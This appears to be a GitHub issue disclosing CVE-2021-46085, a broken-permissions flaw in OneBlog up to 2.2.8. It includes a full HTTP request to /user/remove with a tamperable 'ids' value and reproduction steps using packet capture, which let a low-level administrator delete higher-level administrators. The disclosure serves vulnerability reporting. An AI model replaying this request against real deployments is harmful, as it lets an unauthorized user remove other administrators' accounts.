Headline
CVE-2021-46085: There is a Insecure Permissions vulnerability exists in OneBlog <= 2.2.8 · Issue #29 · zhangyd-c/OneBlog
OneBlog <= 2.2.8 is vulnerable to Insecure Permissions. Low level administrators can delete high-level administrators beyond their authority.
[Suggested description]
Insecure Permissions vulnerability exists in OneBlog.Low level administrators can delete high-level administrators beyond their authority (including administrators with the highest authority).
[Vulnerability Type]
Insecure Permissions
[Vendor of Product]
https://github.com/zhangyd-c/OneBlog
[Affected Product Code Base]
<= 2.2.8
[Affected Component]
POST /user/remove HTTP/1.1
Host: localhost:8086
Content-Length: 5
sec-ch-ua: " Not A;Brand";v="99", “Chromium";v="92”
Accept: /
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8086
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8086/users
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; JSESSIONID=c45212ed-03a9-499c-810b-cf5c28e4d5b1
Connection: close
ids= 3(The IDS value is controllable. Any administrator can add, delete, modify and query the data of other administrator users by modifying the IDS value)
[Attack Type]
Remote
[Vulnerability details]
first, prepare two test accounts with different levels.
Senior administrator admin
Low level administrator root123
Step 2: log in to the system with root123 and enter the user management page
Step 3: click the delete button to directly delete the administrator user admin
Delete succeeded!
In addition, you can also use burpsuite to capture packets and delete any user (including yourself) by modifying the value of ids. This is a logical vulnerability because the default secondary rule of the system is that you cannot delete yourself)
The first step is to log in to the background with root123 account and enter user management.
Step 2: after the packet capturing mode is enabled, click the delete button corresponding to user test
You can delete any user by modifying the value of IDS. Here, I modify the value of IDS to the value of the currently logged in user.
Delete succeeded!